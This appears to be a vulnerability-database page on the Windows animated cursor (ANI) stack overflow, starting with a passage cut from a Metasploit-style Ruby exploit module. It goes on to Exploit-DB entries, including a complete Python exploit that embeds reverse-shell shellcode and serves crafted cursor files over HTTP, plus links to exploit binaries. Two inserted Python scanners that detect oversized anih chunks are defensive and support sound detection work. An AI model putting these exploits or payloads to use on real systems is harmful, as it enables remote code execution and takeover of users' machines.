    anih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4]

    # Begin the ANI chunk
    riff = "ACON"

    # Calculate the data offset for the trampoline chunk and add
    # the trampoline chunk if we're attacking Vista
    if target.name =~ /Vista/
      trampoline_doffset = riff.length + 8
      riff << generate_trampoline_riff_chunk
    end

    # Insert random RIFF chunks
    0.upto(rand(128)+16) do |i|
      riff << generate_riff_chunk()
    end

    # Embed the first ANI header
    riff << "anih" + [anih_a.length].pack('V') + anih_a

    # Insert random RIFF chunks
    0.upto(rand(128)+16) do |i|
      riff << generate_riff_chunk()
    end

    # Trigger the return address overwrite
    riff << "anih" + [anih_b.length].pack('V') + anih_b

    # If this is a Vista target, then we need to align the length of the
    # RIFF chunk so that the low order two bytes are equal to a jmp $+0x16
    if target.name =~ /Vista/
      plen = (riff.length & 0xffff0000) | 0x0eeb
      plen += 0x10000 if (plen - 8) < riff.length

      riff << generate_riff_chunk((plen - 8) - riff.length)

      # Replace the operand to the relative jump to point into the actual
      # payload itself which comes after the riff chunk
      riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 5].pack('V')
    end

    # Place the RIFF chunk in front and off we go
    ret = "RIFF" + [riff.length].pack('V') + riff

    # We copy the encoded payload to the stack because sometimes the RIFF
    # image is mapped in read-only pages. This would prevent in-place
    # decoders from working, and we can't have that.
    ret << Rex::Arch::X86.copy_to_stack(payload.encoded.length)

    # Place the real payload right after it.
    ret << payload.encoded

    ret
  end

  # Generates a riff chunk with the first bytes of the data being a relative
  # jump. This is used to bounce to the actual payload
  def generate_trampoline_riff_chunk
    tag = Rex::Text.to_rand_case(rand_text_alpha(4))
    dat = "\xe9\xff\xff\xff\xff" + rand_text(1) + (rand_text(rand(256)+1) * 2)
    tag + [dat.length].pack('V') + dat
  end

  def generate_riff_chunk(len = (rand(256)+1) * 2)
    tag = Rex::Text.to_rand_case(rand_text_alpha(4))
    dat = rand_text(len)
    tag + [dat.length].pack('V') + dat
  end

  def generate_css_padding
    buf =
      generate_whitespace() +
      "/*" +
      generate_whitespace() +
      generate_padding() +
      generate_whitespace() +
      "*/" +
      generate_whitespace()
  end

  def generate_whitespace
    len = rand(100)+2
    set = "\x09\x20\x0d\x0a"
    buf = ''
    while (buf.length < len)
      buf << set[rand(set.length)].chr
    end
    buf
  end

  def generate_padding
    rand_text_alphanumeric(rand(128)+4)
  end

end
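A defensive counterpart to the PoCs above, added here for this page and not part of any of the listed exploits or the Metasploit module: a Python scanner that walks the RIFF chunk tree of an .ani file and flags the condition every exploit on this page depends on, an anih chunk whose declared length is not the 36 bytes of the ANIHEADER structure, together with the "clean anih first, oversized anih later" layout that a first-chunk-only check would miss. The two sample files are constructed here as test fixtures (filler bytes only); the ANIHEADER field order follows the comments in the Metasploit module's generate_ani.

```python
"""Scan RIFF/ACON (.ani) files for the anih chunk-size anomaly behind MS07-017."""
import struct

ANIH_HEADER_SIZE = 36  # sizeof(ANIHEADER); LoadAniIcon should copy at most this much


def walk_riff_chunks(data, start, end, depth=0):
    """Yield (fourcc, size, payload_offset, depth) for each chunk in data[start:end].

    A RIFF chunk is a 4-byte id, a 4-byte little-endian size and the payload,
    padded to an even length. LIST chunks hold a 4-byte list type followed by
    nested chunks, which are walked as well. A chunk whose declared size runs
    past the enclosing region is yielded with size None and ends the walk.
    """
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from('<I', data, pos + 4)[0]
        payload = pos + 8
        if payload + size > end:
            yield fourcc, None, payload, depth
            return
        yield fourcc, size, payload, depth
        if fourcc == b'LIST' and size >= 4:
            yield from walk_riff_chunks(data, payload + 4, payload + size, depth + 1)
        pos = payload + size + (size & 1)


def scan_ani(data):
    """Return a list of textual findings for an .ani file; [] means nothing odd."""
    findings = []
    if len(data) < 12 or data[:4] != b'RIFF' or data[8:12] != b'ACON':
        return ['not a RIFF/ACON animated cursor']
    riff_size = struct.unpack_from('<I', data, 4)[0]
    if riff_size + 8 != len(data):
        findings.append('RIFF size %d does not match file length %d'
                        % (riff_size, len(data)))
    anih_seen = 0
    for fourcc, size, payload, depth in walk_riff_chunks(data, 12, len(data)):
        if size is None:
            findings.append('chunk %r at offset %d overruns the file'
                            % (fourcc, payload - 8))
            break
        if fourcc != b'anih':
            continue
        anih_seen += 1
        if size != ANIH_HEADER_SIZE:
            # The MS07-017 condition: the chunk length, not the fixed structure
            # size, controlled how many bytes were copied onto the stack.
            findings.append('anih chunk %d at offset %d declares %d bytes, expected %d'
                            % (anih_seen, payload - 8, size, ANIH_HEADER_SIZE))
            continue
        cb_size = struct.unpack_from('<I', data, payload)[0]
        if cb_size != ANIH_HEADER_SIZE:
            findings.append('anih chunk %d has cbSizeof %d, expected %d'
                            % (anih_seen, cb_size, ANIH_HEADER_SIZE))
    if anih_seen == 0:
        findings.append('no anih chunk present')
    elif anih_seen > 1:
        # The exploits place a clean anih first and the oversized one later,
        # so a scanner has to examine every anih chunk, not just the first.
        findings.append('%d anih chunks present, a well-formed file has one' % anih_seen)
    return findings


def riff_chunk(fourcc, payload):
    """Encode one RIFF chunk, adding the pad byte the format requires for odd sizes."""
    pad = b'\x00' if len(payload) & 1 else b''
    return fourcc + struct.pack('<I', len(payload)) + payload + pad


def ani_file(chunks):
    """Wrap encoded chunks in the outer RIFF/ACON container."""
    body = b'ACON' + b''.join(chunks)
    return b'RIFF' + struct.pack('<I', len(body)) + body


# Constructed fixtures (not files from the page). ANIHEADER fields in the order
# used by the Metasploit module: cbSizeof, cFrames, cSteps, cx, cy, cBitCount,
# cPlanes, jifRate, flags.
GOOD_ANIH = struct.pack('<9I', 36, 1, 1, 0, 0, 0, 0, 10, 1)

BENIGN_ANI = ani_file([
    riff_chunk(b'anih', GOOD_ANIH),
    riff_chunk(b'LIST', b'fram' + riff_chunk(b'icon', b'\x00' * 22)),
])

# Same layout as the PoCs above: a filler chunk, a clean 36-byte anih, then a
# second anih whose declared size exceeds the structure. Filler bytes only.
SUSPECT_ANI = ani_file([
    riff_chunk(b'JUNK', b'\x00' * 16),
    riff_chunk(b'anih', GOOD_ANIH),
    riff_chunk(b'anih', b'A' * 80),
])


if __name__ == '__main__':
    for label, sample in (('benign', BENIGN_ANI), ('suspect', SUSPECT_ANI)):
        print(label, scan_ani(sample) or ['ok'])
```

The walk deliberately runs to the end of the file rather than to the declared RIFF size, so payload bytes appended after the container (as the Vista target above does) surface as a size mismatch or overrun finding instead of being skipped.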
Exploit Database EDB-ID : 3636

Publication date : 2007-03-31 22h00 +00:00
Author : jamikazu
EDB Verified : Yes

..::[ jamikazu presents ]::..

Windows Animated Cursor Handling Exploit (0day) (Version3)

Works on fully patched Windows Vista
I think it is the first real remote code execution exploit on vista =)

Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It must also work on all NT-based Windows, but this is not tested)

Update: It also bypasses the eEye security ANI patch!

Author: jamikazu
Mail: jamikazu@gmail.com

Bug discovered by determina (http://www.determina.com)
Credit: milw0rm, metasploit, SkyLined, http://doctus.net/

Invokes calc.exe if successful

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3636.zip (04012007-exp.zip)

# milw0rm.com [2007-04-01]
Exploit Database EDB-ID : 3651

Publication date : 2007-04-02 22h00 +00:00
Author : YAG KOHHA
EDB Verified : Yes

#--------------------------------------------------------------------------------
# Info: .ANI (RIFF Cursors) 2007 universal exploit generator
# Tested on MS Internet Explorer 6.x-7.x, Windows XP SP2, Windows Vista
# Author: Yag Kohha <skyhole [at] gmail.com>
# 10x`n`Gr33tz 2:
# Jamikazu, Skylined (pretty good t-shirt on BH07 Europe - L00k like skylined, skylined, skylined)
# H.D. Moore and metasploit project
# Kumar Brothers (tnx for Vista patch live show at BH07 Europe),
# Alexander Sotirov (tnx for "Heap Feng Shui" live show at BH07 Europe), str0ke
# Microsoft for great coding and Amsterdam (BH07 Europe) party
#--------------------------------------------------------------------------------

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3651.tar.gz (04032007-ie_ani.tar.gz)

# milw0rm.com [2007-04-03]
Exploit Database EDB-ID : 4045

Publication date : 2007-06-06 22h00 +00:00
Author : RISE Security
EDB Verified : Yes

#!/usr/bin/env python # # $Id: win32-loadaniicon.py 4 2007-06-02 00:47:59Z ramon $ # # Windows Animated Cursor Stack Overflow Exploit # Copyright 2007 Ramon de Carvalho Valle <ramon@risesecurity.org>, # RISE Security <contact@risesecurity.org> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # # # Windows Animated Cursor Stack Overflow Vulnerability # http://www.determina.com/security.research/vulnerabilities/ani-header.html # from BaseHTTPServer import * from os.path import * from random import * from socket import * from string import * from struct import * from sys import * # # windows/shell_reverse_tcp - 287 bytes # http://www.metasploit.com # EXITFUNC=seh, LPORT=1234, LHOST=127.0.0.1 # buf = \ '\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b' + \ '\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01' + \ '\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07' + \ '\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f' + \ '\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b' + \ '\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c' + \ '\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff' + \ '\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0' + \ '\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08' + \ 
'\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53' + \ '\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66' + \ '\x68\x04\xd2\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff' + \ '\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a' + \ '\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95' + \ '\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68' + \ '\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51' + \ '\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff' + \ '\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04' + \ '\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6' + \ '\xff\xd0' # Target list target = [ \ # call [ebx+4] # Microsoft Windows XP SP2 user32.dll (5.1.2600.2622) Multi Language {'addr': 0x25ba, 'len': 2, 'offset': 80}, # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language {'addr': 0x25d0, 'len': 2, 'offset': 80}, # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) English {'addr': 0x769fc81a, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) English # {'addr': 0x77d825d0, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) Portuguese (Brazil) {'addr': 0x769dc81a, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Portuguese (Brazil) # {'addr': 0x77d625d0, 'len': 4, 'offset': 80}, # call [esi+4] # Microsoft Windows XP SP1a userenv.dll English {'addr': 0x75a758b1, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP1a shell32.dll English # {'addr': 0x77441a66, 'len': 4, 'offset': 80}, # Microsoft Windows XP userenv.dll (5.1.2600.0) Portuguese (Brazil) {'addr': 0x75a4579b, 'len': 4, 'offset': 80}, # Microsoft Windows XP shell32.dll (6.0.2600.0) Portuguese (Brazil) # {'addr': 0x77427214, 'len': 4, 'offset': 80}, ] # Target list index tidx = 0 def randstr(count = 1, charset = 'ascii_alpha'): # Set the charset if charset == 'ascii_alpha': charset = digits + 
ascii_uppercase + ascii_lowercase elif charset == 'ascii_letters': charset = ascii_letters elif charset == 'ascii_lowercase': charset = ascii_lowercase elif charset == 'ascii_uppercase': charset = ascii_uppercase elif charset == 'digits': charset = digits elif charset == 'hexdigits': charset = hexdigits elif charset == 'octdigits': charset = octdigits # Create the string i = 0 str = '' while i < count: str = str + charset[randint(0, len(charset)-1)] i = i + 1 return str def riff_chunk(): chunk_id = randstr(4) chunk_data = randstr(randint(1, 256)*2) chunk_size = pack('<L', len(chunk_data)) return chunk_id + chunk_size + chunk_data def riff_ani_file(): global buf, target, tidx # Create the first header subchunk anih_a = [36, randint(1, 65535), randint(1, 65535), 0, 0, 0, 0, 0, 1] anih_a = pack('<%dL' % len(anih_a), *[i for i in anih_a]) anih_a = 'anih' + pack('<L', len(anih_a)) + anih_a # Create the second header subchunk anih_b = randstr(target[tidx]['offset']) # Set the current indexed target if target[tidx]['len'] == 1: anih_b = anih_b + pack('<B', target[tidx]['addr']) elif target[tidx]['len'] == 2: anih_b = anih_b + pack('<H', target[tidx]['addr']) else: anih_b = anih_b + pack('<L', target[tidx]['addr']) anih_b = 'anih' + pack('<L', len(anih_b)) + anih_b # Format ID riff = 'ACON' # Random subchunks for i in range(randint(1, 256)): riff = riff + riff_chunk() # First header subchunk riff = riff + anih_a # Random subchunks for i in range(randint(1, 256)): riff = riff + riff_chunk() # Second header subchunk riff = riff + anih_b # Shellcode riff = riff + buf # File ID and length of file riff = 'RIFF' + pack('<L', len(riff)) + riff # Update the target list index if tidx < len(target)-1: tidx = tidx + 1 else: tidx = 0 return riff def randhtml(): global buf, target, tidx # Random RIFF file extensions extension = ['ani', 'avi', 'cdr', 'rmi', 'wav'] # Random html document html = \ '<html>\n<head>\n<title>' + \ randstr(randint(1, 256)) + \ '</title>\n</head>\n<body>\n' for 
i in range(randint(0, 4)): html = html + randstr(randint(1, 256)) + '\n' for i in range(len(target)): html = html + \ '<div id="' + randstr(randint(4, 16)) + '" ' \ 'style="cursor: url(/' + randstr(randint(4, 16)) + '.' + \ extension[randint(0, len(extension)-1)] + ')">\n' for i in range(randint(0, 4)): html = html + randstr(randint(1, 256)) + '\n' html = html + '</div>\n' for i in range(randint(0, 4)): html = html + randstr(randint(1, 256)) + '\n' html = html + '</body>\n</html>\n' return html class RequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) if self.path == '/': # Send the html document html = randhtml() self.send_header('Content-Type', 'text/html; charset=UTF-8') self.send_header('Content-Length', str(len(html))) self.end_headers() self.wfile.write(html) return # Generate and send the RIFF file riff = riff_ani_file() self.send_header('Content-Type', 'application/octetstream') self.send_header('Content-Length', str(len(riff))) self.end_headers() self.wfile.write(riff) def usage(): print 'Usage: ./%s <http_host> <http_port> <host> <port>' \ % basename(argv[0]) if __name__ == '__main__': print 'Windows Animated Cursor Stack Overflow Exploit' print 'Copyright 2007 RISE Security <contact@risesecurity.org>\n' args = argv[1:] if '-h' in args or '--help' in args: usage() exit() http_host = '0.0.0.0' http_port = 8080 host = '127.0.0.1' port = 1234 try: http_host = argv[1] http_port = atoi(argv[2]) host = argv[3] port = atoi(argv[4]) except: pass # Set shellcode host and port to connect to buf = buf[:160] + inet_aton(gethostbyname(host)) + buf[164:] buf = buf[:166] + pack('<H', port) + buf[168:] # Start the HTTP server server_class = HTTPServer httpd = server_class((http_host, http_port), RequestHandler) print 'Listening on %s:%s' % (http_host, http_port) try: httpd.serve_forever() except: pass # milw0rm.com [2007-06-07]
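The exploit above builds a RIFF/ACON container with one well-formed 36-byte `anih` header chunk followed by a second `anih` chunk that is far larger than 36 bytes. The following is an added defensive example written for this page (not code from RISE Security or any other author listed here): a small RIFF walker that reports any `anih` chunk whose declared size differs from the 36-byte header structure, any chunk whose declared size overruns its container, and files carrying more than one `anih`. The sample files, the `JUNK` chunk name and the filler bytes are constructed for the example; the 9-DWORD field order in `VALID_ANIH` follows the Windows ANI header layout (cbSizeOf first).

```python
"""Structural checks for Windows animated cursor (RIFF/ACON) files.

Added example for this page, not code from any exploit author above.
Flags 'anih' chunks whose declared size is not the 36-byte header size,
the condition a crafted cursor file relies on.
"""
import struct

ANIH_SIZE = 36  # sizeof the ANI header structure: 9 little-endian DWORDs


def _chunk(fourcc, payload):
    """Encode one RIFF chunk: id, little-endian size, payload, pad to even."""
    pad = b"\x00" if len(payload) % 2 else b""
    return fourcc + struct.pack("<I", len(payload)) + payload + pad


def build_ani(anih_payloads, extra=()):
    """Build a RIFF/ACON container from the given chunks (test fixture helper)."""
    body = b"ACON"
    for fourcc, payload in extra:
        body += _chunk(fourcc, payload)
    for payload in anih_payloads:
        body += _chunk(b"anih", payload)
    return b"RIFF" + struct.pack("<I", len(body)) + body


def iter_chunks(data, start, end, depth=0):
    """Yield (fourcc, offset, payload, depth) for each chunk in data[start:end].

    LIST chunks are descended into (their first 4 bytes are the list type).
    A chunk whose declared size overruns the container yields payload=None
    and stops the walk, since nothing after it can be trusted.
    """
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        payload_start = pos + 8
        payload_end = payload_start + size
        if payload_end > end:
            yield (fourcc, pos, None, depth)
            return
        yield (fourcc, pos, data[payload_start:payload_end], depth)
        if fourcc == b"LIST" and size >= 4:
            yield from iter_chunks(data, payload_start + 4, payload_end, depth + 1)
        pos = payload_end + (size & 1)  # RIFF chunks are word-aligned


def check_ani(data):
    """Return a list of findings; an empty list means the anih layout is sane."""
    findings = []
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON file"]
    riff_size = struct.unpack_from("<I", data, 4)[0]
    end = min(len(data), 8 + riff_size)
    anih_count = 0
    for fourcc, offset, payload, _depth in iter_chunks(data, 12, end):
        if payload is None:
            findings.append("chunk %r at offset %d overruns its container"
                            % (fourcc, offset))
            continue
        if fourcc != b"anih":
            continue
        anih_count += 1
        if len(payload) != ANIH_SIZE:
            findings.append("anih chunk #%d at offset %d declares %d bytes, expected %d"
                            % (anih_count, offset, len(payload), ANIH_SIZE))
        elif struct.unpack_from("<I", payload)[0] != ANIH_SIZE:
            findings.append("anih chunk #%d at offset %d has cbSizeOf %d, expected %d"
                            % (anih_count, offset,
                               struct.unpack_from("<I", payload)[0], ANIH_SIZE))
    if anih_count != 1:
        findings.append("%d anih chunks found, expected exactly 1" % anih_count)
    return findings


# Constructed samples for the example (not real-world files).
# cbSizeOf=36, cFrames=1, cSteps=1, cx=32, cy=32, cBitCount=32, cPlanes=1, JifRate=10, flags=1
VALID_ANIH = struct.pack("<9I", ANIH_SIZE, 1, 1, 32, 32, 32, 1, 10, 1)
GOOD_ANI = build_ani([VALID_ANIH])
# A second anih padded well past 36 bytes with plain filler, the shape a
# crafted cursor uses; the odd-length JUNK chunk exercises RIFF padding.
OVERSIZED_ANI = build_ani([VALID_ANIH, b"A" * 84], extra=[(b"JUNK", b"x" * 7)])

if __name__ == "__main__":
    for name, blob in (("good", GOOD_ANI), ("oversized", OVERSIZED_ANI)):
        print(name, check_ani(blob) or ["ok"])
```

Run against a directory of cursor files, a non-empty result from `check_ani` is a cheap triage signal; the walker stops at the first chunk that overruns its container rather than trusting later offsets.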
Exploit Database EDB-ID : 3635

Publication date : 2007-03-31 22h00 +00:00
Author : Trirat Puttaraksa
EDB Verified : Yes

Microsoft ANI Buffer Overflow Exploit
Author: Trirat Puttaraksa
http://sf-freedom.blogspot.com
Tested on: Windows XP SP2 fully patched + IE 6 SP2
For educational purpose only

There is much confusion about this vulnerability. Someone said that this could not be exploited in XP SP2 - that's wrong. I provide this exploit because I want to tell these people that they are in danger. This exploit will call calc.exe (shellcode from metasploit win32_exec CMD=calc.exe EXITFUNC=process).

P.S. I do not include the source code for generating the .ani file because of its damage. However, if you reverse engineer the .ani file, you will know how I could produce this exploit in 10 minutes. I will describe this vulnerability and how to exploit it in my blog after M$ releases the patch.

greets: used SkyLined's idea of exploitation. tnx to him.

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3635.zip (04012007-ani.zip)

# milw0rm.com [2007-04-01]
Exploit Database EDB-ID : 3634

Publication date : 2007-03-31 22h00 +00:00
Author : jamikazu
EDB Verified : Yes

..::[ jamikazu presents ]::..

Windows Animated Cursor Handling Exploit (0day)
Works on fully patched Windows Vista
I think it is the first real remote code execution exploit on Vista =)

Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2 (It also must work on all NT-based Windows, but not tested)

Author: jamikazu
Mail: jamikazu@gmail.com
Bug discovered by determina (http://www.determina.com)
Credit: milw0rm, metasploit, SkyLined, http://doctus.net/

invokes calc.exe if successful

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3634.zip (04012007-Animated_Cursor_Exploit.zip)

# milw0rm.com [2007-04-01]

Products Mentioned

Configuration 0

Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2000 >> Version -
Microsoft>>Windows_2003_server >> Version -
Microsoft>>Windows_vista >> Version *
Microsoft>>Windows_xp >> Version *

Configuration 0

Avaya>>Ip600_media_servers >> Version *
Microsoft>>Ie >> Version 7.0
Microsoft>>Internet_explorer >> Version To (including) 6
Avaya>>Definity_one_media_server >> Version *
Avaya>>S3400 >> Version *
Avaya>>S8100 >> Version *

References

http://www.vupen.com/english/advisories/2007/1151
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/23194
Tags : vdb-entry, x_refsource_BID
http://www.securitytracker.com/id?1017827
Tags : vdb-entry, x_refsource_SECTRACK